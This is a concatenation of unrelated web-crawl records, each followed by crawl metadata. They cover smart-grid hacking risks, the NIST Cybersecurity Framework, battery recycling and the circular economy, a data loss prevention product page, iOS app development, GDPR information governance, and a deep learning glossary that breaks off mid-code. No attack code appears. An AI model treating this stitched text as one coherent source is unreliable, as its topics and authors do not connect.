<urn:uuid:7a88344a-a9cd-4e55-8d2b-01332cf69da4>
CC-MAIN-2022-40
https://www.citrix.com/it-it/solutions/app-delivery-and-security/what-is-web-application-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.914802
1,339
2.78125
3
InformationWeek reports that researchers at last week’s IEEE SmartGridComm2010 conference estimate that by 2015, the smart grid will offer up to 440 million potential points to be hacked. Why mess with someone’s home electricity meter? Le Xie, an assistant professor of electrical and computer engineering at Texas A&M University, says it could provide attackers with the means to benefit financially. The article explains: Utilities typically plan their energy requirements one day in advance. An attacker who manipulated apparent energy demands, forcing utilities to turn to emergency — and more expensive — energy resources could likewise place safe bets in the energy market. Gambling against the price difference between the day-ahead market and the real-time market could be a real payoff. Attackers also may want to cause chaos by taking out sensitive facilities or using usage patterns to determine when a consumer is on vacation and then burgling their house. Another issue is that today’s smart grid systems could have a life span of 10 or 20 years. With such a long life span, their built-in security will become widely known and disseminated. As the article notes: Today’s new smart grid meter could be 2030’s cyber-catastrophe, or at least give rise to some new variation on Stuxnet. As a starting point to protecting the smart grid, the National Institute of Standards and Technology has released a list of 189 security requirements to build a safe, secure and reliable smart grid.
<urn:uuid:0244bc48-e74c-4cf0-82bd-f81befc818fa>
CC-MAIN-2022-40
https://www.enterprisenetworkingplanet.com/security/researchers-warn-of-smart-grid-cyber-attack-opportunities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.941956
305
2.78125
3
Using a cybersecurity framework is absolutely a best practice. Experience has led the cybersecurity community to think of defense in terms of process. Over time and through extensive coordination the best of these processes have made their way into standards and guidance documents and corporate policies. Every firm is different so rather than borrow someone else’s policy you can start with an outline or framework of an approach. Our preferred framework for small to medium businesses is the one coordinated by the National Institute of Standards and Technology (NIST), called the “Framework for Improving Critical Infrastructure Cybersecurity”, or frequently just called the NIST Cybersecurity Framework. We like the NIST framework because it is easy to remember, and the terms it introduces help reduce ambiguity when communicating in companies and also when communicating between companies. It is both a framework for building an action plan and it is a common taxonomy that can enhance your ability to communicate on cybersecurity topics with your suppliers, government and business clients. We also like the framework because it is built on an understanding of risk management processes. Most cyber security decisions in small to medium sized businesses should be informed by topics such as risk tolerance and impact on business processes. This framework supports that. The core of the NIST Cybersecurity framework is built around five core process categories: Understand and Identify: Organizations need to understand and identify cyber risks to business, assets which need to be protected, as well as resources required to operate. You must know yourself and know the threat. It is also important to know best practices in defense. Protect: Developing appropriate safeguards that can mitigate the impact of a breach of compromise of employee information or damage to your online presence are key. This is the meat of your plan. A good cyber defense will protect the right things and ensure if there is a breach that its impact is mitigated. Detect: Current operations in defense of networks and a study of the history of cyber crime leads to the unfortunate conclusion that the bad guys will continue to breach networks and gain unauthorized access to information. When the right protections are in place their actions can be contained. Putting the right tools and processes in place to detect issues are also key to taking the right action. Respond: When a cyber event occurs the processes should be in place to enable a rapid response. Response will depend on the nature of the incident, but could include notification of clients, partners, suppliers, law enforcement and others. It could also include bringing in outside help to push the adversaries out and improve defenses. Recover: Planning for recovery can help return your business to normal operations as fast as possible. Do you have other tips we should know about? Please contact us here and let us know what we should know.
<urn:uuid:cb74a837-7678-4714-b152-8cd5122126ac>
CC-MAIN-2022-40
https://crucialpointllc.com/leveraging-the-nist-cybersecurity-framework-to-economically-reduce-cyber-threats/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00420.warc.gz
en
0.95139
556
2.578125
3
October 28, 2020
Thanks to continuous innovation, upgrades and a human need to be in front of the trends, the product lifecycle is getting shorter for everything from electronic devices to clothes. As a result, mountains of obsolete, discarded items are being created that can take hundreds of years – and in the case of plastics, thousands – before they begin to break down. In 2019 alone, 2.01 billion metric tons of waste was generated, and if we continue at the same rate, that figure will increase to 3.40 billion metric tons – an increase of 70 percent – by 2050. The environmental impacts of this waste are widely understood, with rotting items contributing to greenhouse gas emissions, general pollution, and microplastics littering our waterways and infiltrating the food chain. What many don't seem to understand, however, is the economic impact of waste. With environmentalist pleas mainly focusing on the negative environmental impacts of pollution, the economic impacts, like the waste of raw materials and the cost of energy that goes into manufacturing these kinds of products, often go under the radar. With this in mind, it's clear that the world's carefree attitude towards waste is not sustainable, but what exactly is the solution? As it stands, the world operates on a linear economic model, where primary providers supply manufacturing companies with virgin materials to create their products. These products are created, sent to stores, purchased by the consumer, used and then thrown away, with the bulk of these valuable materials ending up in landfills, never to be used again. The redesign of this economic model is where the solution lies, and one economic model that is quickly gaining traction for its viability in the scientific, economic, and environmentalist communities is the concept of a closed loop, or circular, economy. According to The Ellen MacArthur Foundation, a closed loop economy is an industrial system that is restorative or regenerative by intention and design. This means that every product, material, or resource within the economy is maintained, or in use, for as long as possible in an effort to minimize the amount of waste generated. Three principles guide this approach: the first is to design out waste and pollution, the second is to keep products and materials in use for as long as possible, and the third is to regenerate natural systems. A great example of the circular economy in action can be found in the lithium-ion (li-ion) battery industry, where a number of technologies are emerging to provide a circular pathway for li-ion batteries at the end of their life. Through this process, end-of-life batteries are sent to resource recovery facilities where, through a process of shredding and wet chemistry, 80 to 100 percent of resources are recycled back into raw materials that can be used to manufacture new batteries or returned to other parts of the economy. These materials are of the same quality as virgin materials, thus enabling a similar product to be manufactured that could possibly be recycled again in the future.
This process reduces both the amount of electronic waste that goes to landfill and the amount of energy required to generate new batteries components from virgin materials, while also preserving finite natural resources like cobalt and lithium. The numbers back up these reductions too, with a Life Cycle Assessment (LCA) study by Li-Cycle reporting that through resource recovery, GHG emissions per one tonne of battery materials produced by their operations in Ontario are 74.14 percent lower compared to sourcing these materials from mining and refining. In addition to this, reductions in the volume of water used across all stages of production was significant across the board. While li-ion batteries are just one example of how a closed loop economy can provide immense benefits in terms of both environmental impact and energy savings, the benefits of such an economy can be found when implemented in almost every industry sector. Some beer businesses like Sierra Nevada, for example, have made steps toward closing the loop in the company’s California facility, where beermakers are composting waste generated from the brewery into soil used to grow barley and hops. For Days, a subscription-based clothing brand provides customers with a bundle of clothes that when well-worn and stained, are sent back to the company for a new set of clothes, made directly from those used threads. Apple has also made steps towards building a closed loop, announcing plans to transition to 100 percent recycled products. Furthermore, they have started a ‘take back’ program where customers can trade in their old phones and computers to strip and remake the components into new products. If adopted on a large-scale, this closed loop economy can offer benefits that stretch further than cost savings and a healthier climate and environment. A closed loop initiative shows potential to create new jobs and curb human exploitation through new industries dedicated to processing recovered resources. While making the shift to a closed-loop economy will undoubtedly have some growing pains during the transition, to reap the myriad of benefits the long-term shift must begin now rather than later. About Ajay Kochhar Ajay Kochhar is the Co-Founder, President and CEO at Li-Cycle, an advanced lithium-ion battery resource recovery company. Li-Cycle Technology is a closed loop, economically viable, safe, sustainable and scalable processing technology that provides a solution to the global lithium-ion battery recycling problem.
<urn:uuid:9c80140c-790f-45bb-a39d-9e5af9c7280d>
CC-MAIN-2022-40
https://internetofbusiness.com/is-recycling-the-new-manufacturing-how-companies-who-take-a-green-circular-approach-are-saving-money-and-the-environment/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00420.warc.gz
en
0.951579
1,147
3.765625
4
Data loss prevention What is data loss prevention? Data loss prevention (DLP) involves systematically identifying, locating, and assessing data and user activities with content-and-context awareness to apply policies or proactive responses to prevent data loss. Data at rest, in use, and in motion must be under constant surveillance to spot deviations in the way enterprise data is stored, used, or shared. This includes analyzing data streams across endpoints, data shared with business associates, and data in the cloud. Why is data loss prevention important? Data loss prevention has grown beyond legacy systems of only physical and software controls for data protection. DLP is an integrated approach to identifying data that is most vulnerable and responding to threats to its security and integrity. The major reasons for deploying DLP are: Blocking data breaches 3,932 breaches were publicly reported in 2020 according to Risk Based Security. Given the staggering rise in data breaches, it's essential to invest in trustworthy tools to help prevent incidents that would disrupt business. Detecting insider activity Data can be exposed by malicious insiders who stand to gain something from doing so, but unsuspecting users can also accidentally leak data due to negligence. Monitoring for signs of leaks is important to quickly spot and confine the impact of data loss. Securing sensitive data It's critical to locate and secure all personally Identifiable Information (PII), health records, and card payment information in your data stores. The strategic combination of data discovery, real-time change detection, and rapid incident response provided by DLP tools helps promptly identify an attack and thwart data exfiltration. Complying with data regulations PCI DSS, the GDPR, and other data privacy regulations require organizations to deploy data loss prevention software to protect sensitive data from accidental loss, destruction, or damage. How does data loss prevention work? Data loss prevention involves the following processes to effectively secure and prevent data loss: Identifying and classifying data It's important to identify instances of sensitive data in an organization to ensure it's being handled safely. For example, data in use, in motion, or at rest can contain PII; if this data falls into the wrong hands, the resulting breach or data theft can be fatal to a business. A data classification tool can help not only with locating data but also classifying it according to the level of confidentiality and security required. Data laws like the GDPR, HIPAA, PCI DSS, and others specify how data should be stored, treated, processed, and handled to prevent data thefts or breaches. Adhering to these laws not only helps secure data and prevent hefty violation fines, but also creates trust among customers. Monitoring data movements File access events have to be monitored in real time to detect ransomware attacks, insider threats, and other cyberthreats. File system auditing software can track file creation, deletion, modification, or security permission changes. It can also instantly spot unauthorized changes and unusual file activities indicative of cyberattacks, enabling IT teams to roll out remedial measures as soon as an attack is detected. Unauthorized data transfers can be caused by privilege escalation or undue access to files. A file analysis tool comes in handy to identify permission inconsistencies and files with open or full access to rectify them. 
Ensure that the principle of least privilege (POLP) is followed to grant users only the rights needed to fulfill their job roles.
Detecting and preventing data leaks
Control what goes out of user devices, removable storage media, and other file sharing channels. Stringent policies regarding data access and transfer are necessary to ensure that data only reaches the right hands. Secure data by enabling multi-factor authentication (MFA), as it lowers the chances of user accounts being hacked. A data loss prevention tool can help monitor files that are actively used and shared in your organization. For monitoring the cloud, cloud protection software can be used to analyze and block unauthorized web access over the internet. Besides monitoring data movement, strengthen authorized data movements at the periphery using firewalls and antivirus applications. As a last security measure, data encryption can be used to defend against eavesdropping.
How DataSecurity Plus helps prevent data leaks
DataSecurity Plus is ManageEngine's unified DLP platform that offers the essentials needed to monitor and secure your data stores. It combines data visibility and security features to enable content-and-context-aware DLP.
Locating and classifying data: PII scanning to pinpoint personally identifiable information like email addresses and phone numbers; data classification to automate file tagging and sort files as Public, Internal, Sensitive, or Restricted; permission analysis to find permission inconsistencies that insiders or hackers can misuse for unauthorized data transfers; and data risk assessment to identify data privacy violations, locate the source, and rectify them.
Monitoring data movements: file activity monitoring for real-time reports on changes to file repositories, and file integrity monitoring to ensure that data is safe from unauthorized changes and to spot ransomware attacks indicated by excessive file renames or deletions.
Detecting data leaks: insider threat monitoring to prevent unauthorized transfers of business data out of the organization; file copy monitoring for tracking files copied by users to other network locations or removable storage devices; USB activity monitoring to control or block removable storage devices and peripheral devices; and cloud application discovery for monitoring web traffic from endpoints and managing file uploads.
Schedule a personalized demo or try all of these features in a fully functional, 30-day trial.
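As an illustration of the PII-scanning idea described above, the following is a minimal, hypothetical sketch, not DataSecurity Plus code, that walks a directory and flags files containing patterns that look like email addresses or card numbers. The regular expressions and the path are simplifying assumptions; a production DLP tool uses far more robust, validated detection.

```python
import os
import re

# Simplified, illustrative patterns; real DLP engines use validated,
# locale-aware detectors (e.g. Luhn checks for card numbers).
PII_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def scan_file(path):
    """Return a dict of PII types found in a single text file."""
    findings = {}
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as handle:
            text = handle.read()
    except OSError:
        return findings
    for label, pattern in PII_PATTERNS.items():
        matches = pattern.findall(text)
        if matches:
            findings[label] = len(matches)
    return findings

def scan_tree(root):
    """Walk a directory tree and report files that appear to contain PII."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            findings = scan_file(path)
            if findings:
                print(f"{path}: {findings}")

if __name__ == "__main__":
    scan_tree("./shared-drive")  # hypothetical path to a file share
```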
<urn:uuid:eaf1b521-6647-41a9-a893-0775b6b9fe33>
CC-MAIN-2022-40
https://www.manageengine.com/data-security/what-is/data-loss-prevention.html?source=what-is
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00420.warc.gz
en
0.897837
1,160
2.984375
3
iOS app development iOS app development What is iOS app development? iOS application development is the process of making mobile applications for Apple hardware, including iPhone, iPad and iPod Touch. The software is written in the Swift programming language or Objective-C and then deployed to the App Store for users to download. If you’re a mobile app developer, you may have had reservations about iOS development. For example, each developer needs a Mac computer—and Macs are generally more expensive than their Windows-based counterparts. In addition, once you complete your app, it faces a stringent quality review process before it can be distributed through the App Store. Nevertheless, if your organization’s employees, customers or partners are among the hundreds of millions of Apple iPhone and iPad users around the world, you have obvious reasons to engage in iOS app development. And despite potentially high barriers to entry, developing an iOS app can be as easy as (in some cases easier than) developing for Android. With proper planning and the right resources, you can join the ranks of iOS app developers. Are you ready to try your hand at iOS mobile app development? IBM offers an easy-to-follow, hands-on tutorial for building an iOS app with cloud-based push notifications and performance monitoring. Meet the developer requirements Before you write a single line of code in the iOS app development process, you need: - An Apple Mac computer running the latest version of macOS. - Xcode, which is the integrated development environment (IDE) for macOS, available as a free download from the Mac App Store. - An active Apple Developer account, which requires a $99 annual fee. These three requirements work together: Only active members of the Apple Developer Program can post an app to the Apple App Store. Only apps signed and published by Xcode are eligible for submission to the App Store. Xcode runs only on macOS, and macOS runs only on Apple computers. The good news is that Xcode offers much more than just the ability to sign and publish your completed app. The IDE contains a user interface designer, code editor, testing engine, asset catalogue and more—virtually everything you need for iOS app development. Select an iOS programing language There are currently two programming languages for iOS app development. - Objective-C: Developed in the early 1980s, Objective-C was the primary programming language for all Apple products for decades. Derived from the C language, Objective-C is an object-oriented programming language centered on passing messages to different processes (as opposed to invoking a process in traditional C programming). Many developers choose to maintain their legacy applications written in Objective-C instead of integrating them into the Swift framework, which was introduced in 2014. - Swift: The Swift programming language is the new “official” language of iOS. While it has many similarities to Objective-C, Swift is designed to use a simpler syntax and is more focused on security than its predecessor. Because it shares a run time with Objective-C, you can easily incorporate legacy code into updated apps. Swift is easy to learn, even for people just beginning to program. Because Swift is faster, more secure and easier to use than Objective-C, you should plan to use it to develop your iOS app unless you have a compelling reason to stick with Objective-C. 
Tap into APIs and libraries One of the major advantages of iOS app development is the extensive collection of developer resources available to you. Because of the standardization, functionality and consistency of iOS app development, Apple is able to release native APIs and libraries as kits that are stable, feature-rich and easy to use. You can use these iOS SDKs to seamlessly integrate your app into Apple’s existing infrastructure. For example, if you’re working on an app controller for a smart toaster oven, you can use HomeKit to standardize the communication between the toaster and the phone. Users will be able to coordinate communication between their smart toaster oven and their smart coffee maker. There are kits for game development (such as SpriteKit, GameplayKit and ReplayKit), health apps, maps, cameras, as well as Siri, Apple’s virtual assistant. These extensive kits allow you to take advantage of the features built into iOS and integrate third-party apps with ease, creating apps that connect to social media, use the camera or native calendar app, or automatically record replay videos of an especially thrilling gameplay moment. Expand into the cloud iPhones are powerful devices. But to handle resource-intensive tasks, consider offloading the heavy lifting to the cloud. By connecting your app to cloud-based services through APIs, you can use the cloud for storage, database management, and even app caching. You can also augment your app with innovative next-generation services. IBM Cloud® supports server-side Swift frameworks, including Kitura, for building iOS back ends as well as web applications. You can invoke REST APIs from within the iOS app. Using Kitura, you can integrate with a range of IBM Cloud services, from push notifications and databases to mobile analytics and machine learning. (For more on building iOS back ends, see this short IBM tutorial about creating an app with Kitura.) Test locally, test globally Even the best developers don’t write perfect code — at least not the first time around. Once you’ve completed your iOS app development, you’ll need to test it. Fortunately, you will not need to test mobile devices from multiple manufacturers, as you might when developing for Android. iOS is Apple’s proprietary mobile operating system, which runs only on Apple iPhones. Although you might want to test your iOS app on several generations of iPhones (with multiple operating systems), there are still fewer devices to test than with Android. Your first line of testing is in Xcode itself. In addition to the standard unit tests you’re used to, Xcode features automated UI testing. You can write tests that navigate through your UI, interacting with your app like a user would to locate any issues. The UI testing doesn’t use APIs to interact with your code—it simulates a real user’s interaction with your app. As long as you write tests that cover every aspect of your app, you can automatically get UI testing that’s often more thorough than what any human can accomplish. However, unless your tests account for every possible interaction a user could have with your app, you’ll still want to let humans beta test your software. While you can sideload apps to iOS devices without submitting them to the App Store, Apple makes it easy for friends, family or your user base to preview your app with its TestFlight app. TestFlight allows Apple Developer Program members to do internal testing with up to 25 team members on up to 30 devices each. 
You can give your iOS app development team a chance to test your app in a small group and prepare for the Apple Beta review so that you can release your new iOS app to external testers. Once Apple approves your app under its App Store review guidelines, you can invite up to 10,000 users to download a test version. These users download the TestFlight app and use a unique link to access your app. You can divide your external testers into custom groups and push specific builds to each group, allowing you to perform A/B tests and compare responses to features. In return, you automatically get data on usage and users can easily submit feedback about any issues they encounter. Publish your app to the App Store Once you’re done with iOS app development and testing, you’ll need to submit your app to the App Store. You can submit and sign your app directly through Xcode. Be patient: The app review process can be lengthy, frequently requiring multiple iterations of rejection-revision-resubmission-rejection until you get your final approval. Once you’ve passed all approvals, you can build your App Store page by using a program called App Store Connect and push your app to the App Store. If you’re planning on selling your app, remember that Apple takes a 30 percent cut of your sales, in addition to the $99 annual fee they charge to participate in the Developer Program. Are you ready to try your hand at iOS app development? Want to see your iOS app in use on iPhones, iPads and other Apple devices the world over? IBM offers an easy-to-follow, hands-on tutorial for building an iOS app with cloud-based push notifications and performance monitoring. Learn about the features and capabilities of the IBM Mobile Foundation, in addition to IBM Push Notifications through the Introduction to Mobile Foundation course contained within the IBM Cloud Professional Developer curriculum.
<urn:uuid:0ebfadad-4895-48a5-ae15-05ae326e21f1>
CC-MAIN-2022-40
https://www.ibm.com/cloud/learn/ios-app-development-explained
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00420.warc.gz
en
0.924596
1,800
2.8125
3
The new General Data Protection Regulation (GDPR) is not all about ensuring that your business or organisation has consent to process personal data; there is far more to it than that. Information governance is a major consideration, as covered by Article 32 of the regulation. Does this mean that all personal data has to be encrypted? Many businesses and organisations choose to encrypt all of the personal data that they deal with. However, GDPR does not actually stipulate that this is necessary in order for businesses and organisations to be compliant. It simply states that data needs to be kept and processed securely, in a manner that is appropriate to the level of risk that is present. Why is the measurement of risk important? Businesses and organisations that process high levels of sensitive personal data, or whose data processing may involve a level of risk, need to assess risks and potential impacts. Data Protection Impact Assessments (DPIAs) should be used for this purpose. Once high-risk data processing activities have been identified, they need to be mitigated. Processes and procedures that are put in place need to be fully documented in order for the business or organisation to meet compliance requirements. If there is no apparent mitigation available in a high-risk situation, the business or organisation should not process the data until it has consulted with the appropriate Data Protection Authority (DPA). Reporting data breaches Businesses and organisations also need to have plans in place for the reporting of data breaches when they occur. Any breaches need to be reported to the DPA within 72 hours of the business or organisation first becoming aware of the breach. Planning of this type is an important consideration when it comes to dealing with the information governance aspect of GDPR compliance.
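To illustrate the kind of risk-appropriate safeguard discussed above, here is a minimal, hypothetical sketch of encrypting a personal data field before it is stored, using the open-source cryptography library for Python. It is an illustration only, not compliance advice; in particular, real deployments keep keys in a dedicated key management system rather than in application code.

```python
from cryptography.fernet import Fernet

# In practice the key would live in a key management service,
# not alongside the data it protects.
key = Fernet.generate_key()
cipher = Fernet(key)

def store_email(email: str) -> bytes:
    """Encrypt a personal data field before persisting it."""
    return cipher.encrypt(email.encode("utf-8"))

def read_email(token: bytes) -> str:
    """Decrypt the stored field for an authorised use."""
    return cipher.decrypt(token).decode("utf-8")

if __name__ == "__main__":
    stored = store_email("jane.doe@example.co.uk")
    print(stored)               # ciphertext at rest
    print(read_email(stored))   # plaintext only when needed
```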
<urn:uuid:4f5d4c0f-525b-48c8-bbe7-2fdea44c237f>
CC-MAIN-2022-40
https://www.compliancejunction.com/information-governance-gdpr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00620.warc.gz
en
0.947514
348
2.640625
3
Ready to learn Artificial Intelligence? Browse courses like Uncertain Knowledge and Reasoning in Artificial Intelligence developed by industry thought leaders and Experfy in Harvard Innovation Lab. Ever struggle to recall what Adam, ReLU or YOLO mean? Look no further and check out every term you need to master Deep Learning. Surviving in the Deep Learning world means understanding and navigating through the jungle of technical terms. You’re not sure what AdaGrad, Dropout, or Xavier Initialization mean? Use this guide as a reference to freshen up your memory when you stumble upon a term that you safely parked in a dusty corner in the back of your mind. This dictionary aims to briefly explain the most important terms of Deep Learning. It contains short explanations of the terms, accompanied by links to follow-up posts, images, and original papers. The post aims to be equally useful for Deep Learning beginners and practitioners. Let’s open the encyclopedia of deep learning. Activation Function— Used to create a non-linear transformation of the input. The inputs are multiplied by weights and added to a bias term. Popular Activation functions include ReLU, tanh or sigmoid. Adam Optimization — Can be used instead of stochastic gradient descent optimization methods to iteratively adjust network weights. Adam is computationally efficient, works well with large data sets, and requires little hyperparameter tuning, according to the inventors. Adam uses an adaptive learning rate α, instead of a predefined and fixed learning rate. Adam is currently the default optimization algorithm in deep learning models. Adaptive Gradient Algorithm — AdaGrad is a gradient descent optimization algorithm that features an adjustable learning rate for every parameter. AdaGrad adjusts the parameters on frequently updated parameters in smaller steps than for less frequently updated parameters. It thus fares well on very sparse data sets, e.g. for adapting word embeddings in Natural Language Processing tasks. Read the paper here. Average Pooling — Averages the results of a convolutional operation. It is often used to shrink the size of an input. Average pooling was primarily used in older Convolutional Neural Networks architectures, while recent architectures favor maximum pooling. AlexNet — A popular CNN architecture with eight layers. It is a more extensive network architecture than LeNet and takes longer to train. AlexNet won the 2012 ImageNet image classification challenge. Read the paper here. Backpropagation —The general framework used to adjust network weights to minimize the loss function of a neural network. The algorithm travels backward through the network and adjusts the weights through a form of gradient descent of each activation function. Backpropagation travels back through the network and adjusts the weights Batch Gradient Descent — Regular gradient descent optimization algorithm. Performs parameter updates for the entire training set. The algorithm needs to calculate the gradients of the whole training set before completing a step of parameter updates. Thus, batch gradient can be very slow for large training sets. Batch Normalization — Normalizes the values in a neural network layer to values between 0 and 1. This helps train the neural network faster. Bias —Occurs when the model does not achieve a high accuracy on the training set. It is also called underfitting. When a model has a high bias, it will generally not yield high accuracy on the test set. 
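Several of the entries above (activation function, ReLU, bias term) are easiest to see in code. Below is a small illustrative sketch in plain NumPy; it is not taken from any particular framework, and the array shapes are arbitrary assumptions chosen for the example.

```python
import numpy as np

def relu(x):
    # Zero for negative inputs, identity otherwise.
    return np.maximum(0.0, x)

def sigmoid(x):
    # Squashes inputs into the (0, 1) range.
    return 1.0 / (1.0 + np.exp(-x))

def dense_layer(inputs, weights, bias, activation=relu):
    # A layer multiplies inputs by weights, adds a bias term,
    # and applies a non-linear activation, exactly as described above.
    return activation(inputs @ weights + bias)

x = np.array([0.5, -1.2, 3.0])
w = np.random.randn(3, 4)
b = np.zeros(4)
print(dense_layer(x, w, b))
```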
Classification — When the target variable belongs to a distinct class, not a continuous variable. Image classification, fraud detection or natural language processing are examples of deep learning classification tasks. Convolution — A mathematical operation which multiplies an input with a filter. Convolutions are the foundation of Convolutional Neural Networks, which excel at identifying edges and objects in images. Cost Function — Defines the difference between the calculated output and what it should be. Cost functions are one of the key ingredients of learning in deep neural networks, as they form the basis for parameter updates. The network compares the outcome of its forward propagation with the ground-truth and adjusts the network weights accordingly to minimize the cost function. The root mean squared error is a simple example of a cost function. Deep Neural Network — A neural network with many hidden layers, usually more than five. It is not defined how many layers minimum a deep neural network has to have. Deep Neural Networks are a powerful form of machine learning algorithms which are used to determine credit risk, steer self-driving cars and detect new planets in the universe. Derivative of a function. Source: https://goo.gl/HqKdeg Derivative — The derivative is the slope of a function at a specific point. Derivatives are calculated to let the gradient descent algorithm adjust weight parameters towards the local minimum. Dropout — A regularization technique which randomly eliminates nodes and its connections in deep neural networks. Dropout reduces overfitting and enables faster training of deep neural networks. Each parameter update cycle, different nodes are dropped during training. This forces neighboring nodes to avoid relying on each other too much and figuring out the correct representation themselves. It also improves the performance of certain classification tasks. Read the paper here. End-to-End Learning — An algorithm is able to solve the entire task by itself. Additional human intervention, like model switching or new data labeling, is not necessary. For example, end-to-end driving means that the neural network figures out how to adjust the steering command just by evaluating images. Epoch —Encompasses a single forward and backward pass through the training set for every example. A single epoch touches every training example in an iteration. Forward Propagation — A forward pass in deep neural networks. The input travels through the activation functions of the hidden layers until it produces a result at the end. Forward propagation is also used to predict the result of an input example after the weights have been properly trained. Fully-Connected layer — A fully-connected layer transforms an input with its weights and passes the result to the following layer. This layer has access to all inputs or activations from the previous layer. Gated Recurrent Unit —A Gated Recurrent Unit (GRU) conducts multiple transformations on the given input. It is mostly used in Natural Language Processing Tasks. GRUs prevent the vanishing gradients problem in RNNs, similar to LSTMs. In contrast to LSTMs, GRUs don’t use a memory unit and are thus more computationally efficient while achieving a similar performance. Read the paper here. No forget gate, in contrast to LSTM. Source: https://goo.gl/dUPtdV Human-Level Performance — The best possible performance of a group of human experts. Algorithms can exceed human-level performance. 
Valuable metric to compare and improve neural network against. Hyperparameters — Determine performance of your neural network. Examples of hyperparameters are, e.g. learning rate, iterations of gradient descent, number of hidden layers, or the activation function. Not to be confused with parameters or weights, which the DNN learns itself. ImageNet — Collection of thousands of images and their annotated classes. Very useful resource for image classification tasks. Iteration — Total number of forward and backward passes of a neural network. Every batch counts as one pass. If your training set has 5 batches and trains 2 epochs, then it will run 10 iterations. Gradient Descent — Helps Neural Network decide how to adjust parameters to minimize the cost function. Repeatedly adjust parameters until the global minimum is found. This post contains a well-explained, holistic overview of different gradient descent optimization methods. Layer — A set of activation functions which transform the input. Neural networks use multiple hidden layers to create output. You generally distinguish between the input, hidden, and output layers. Learning Rate Decay — A concept to adjust the learning rate during training. Allows for flexible learning rate adjustments. In deep learning, the learning rate typically decays the longer the network is trained. Maximum Pooling — Only selects the maximum values of a specific input area. It is often used in convolutional neural networks to reduce the size of the input. Long Short-Term Memory — A special form of RNN which is able to learn the context of an input. While regular RNNs suffer from vanishing gradients when corresponding inputs are located far away from each other, LSTMs can learn these long-term dependencies. Read the paper here. Input and Output of an LSTM unit. Source: https://bit.ly/2GlKyMF Mini-Batch Gradient Descent— An optimization algorithm which runs gradient descent on smaller subsets of the training data. The method enables parallelization as different workers separately iterate through different mini-batches. For every mini-batch, compute the cost and update the weights of the mini-batch. It’s an efficient combination of batch and stochastic gradient descent. Momentum — A gradient descent optimization algorithm to smooth the oscillations of stochastic gradient descent methods. Momentum calculates the average direction of the direction of the previously taken steps and adjusts the parameter update in this direction. Imagine a ball rolling downhill and using this momentum when adjusting to roll left or right. The ball rolling downhill is an analogy to gradient descent finding the local minimum. Neural Network — A machine learning model which transforms inputs. A vanilla neural network has an input, hidden, and output layer. Neural Networks have become the tool of choice for finding complex patterns in data. Non-Max Suppression — Algorithm used as a part of YOLO. It helps detect the correct bounding box of an object by eliminating overlapping bounding boxes with a lower confidence of identifying the object. Read the paper here. Recurrent Neural Networks — RNNs allow the neural network to understand the context in speech, text or music. The RNN allows information to loop through the network, thus persisting important features of the input between earlier and later layers. ReLU— A Rectified Linear Unit, is a simple linear transformation unit where the output is zero if the input is less than zero and the output is equal to the input otherwise. 
ReLU is the activation function of choice because it allows neural networks to train faster and it prevents information loss. Regression —Form of statistical learning where the output variable is a continuous instead of a categorical value. While classification assigns a class to the input variable, regression assigns a value that has an infinite number of possible values, typically a number. Examples are the prediction of house prices or customer age. Root Mean Squared Propagation — RMSProp is an extension of the stochastic gradient descent optimization method. The algorithm features a learning rate for every parameter, but not a learning rate for the entire training set. RMSProp adjusts the learning rate based on how quickly the parameters changed in previous iterations. Read the paper here. Parameters — Weights of a DNN which transform the input before applying the activation function. Each layer has its own set of parameters. The parameters are adjusted through backpropagation to minimize the loss function. Weights of a neural network Softmax — An extension of the logistic regression function which calculates the probability of the input belonging to every one of the existing classes. Softmax is often used in the final layer of a DNN. The class with the highest probability is chosen as the predicted class. It is well-suited for classification tasks with more than two output classes. Stochastic Gradient Descent — An optimization algorithm which performs a parameter update for every single training example. The algorithm converges usually much faster than batch gradient descent, which performs a parameter update after calculating the gradients for the entire training set. Supervised Learning — Form of Deep Learning where an output label exists for every input example. The labels are used to compare the output of a DNN to the ground-truth values and minimize the cost function. Other forms of Deep Learning tasks are semi-supervised training and unsupervised training. Transfer Learning — A technique to use the parameters from one neural network for a different task without retraining the entire network. Use weights from a previously trained network and remove output layer. Replace the last layer with your own softmax or logistic layer and train network again. Works because lower layers often detect similar things like edges which are useful for other image classification tasks. Unsupervised Learning — A form of machine learning where the output class is not known. GANs or Variational Auto Encoders are used in unsupervised Deep Learning tasks. Validation Set — The validation set is used to find the optimal hyperparameters of a deep neural network. Generally, the DNN is trained with different combinations of hyperparameters are tested on the validation set. The best performing set of hyperparameters is then applied to make the final prediction on the test set. Pay attention to balancing the validation set. If lots of data is available, use as much as 99% for the training, 0.5% for the validation and 0.5% the test set. Vanishing Gradients — The problem arises when training very deep neural networks. In backpropagation, weights are adjusted based on their gradient, or derivative. In deep neural networks, the gradients of the earlier layers can become so vanishingly small, that the weights are not updated at all. The ReLU activation function is suited to address this problem because it doesn’t squash the input as much as other functions. Read the paper here. 
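To make the softmax and stochastic gradient descent entries more tangible, here is a small illustrative NumPy sketch. It is a toy example rather than production training code, and the logits and learning rate are arbitrary assumptions.

```python
import numpy as np

def softmax(logits):
    # Subtracting the max keeps the exponentials numerically stable.
    shifted = logits - np.max(logits)
    exp = np.exp(shifted)
    return exp / exp.sum()

def sgd_step(weights, gradient, learning_rate=0.01):
    # Stochastic gradient descent: move each parameter a small step
    # against its gradient, one training example at a time.
    return weights - learning_rate * gradient

logits = np.array([2.0, 1.0, 0.1])
probs = softmax(logits)
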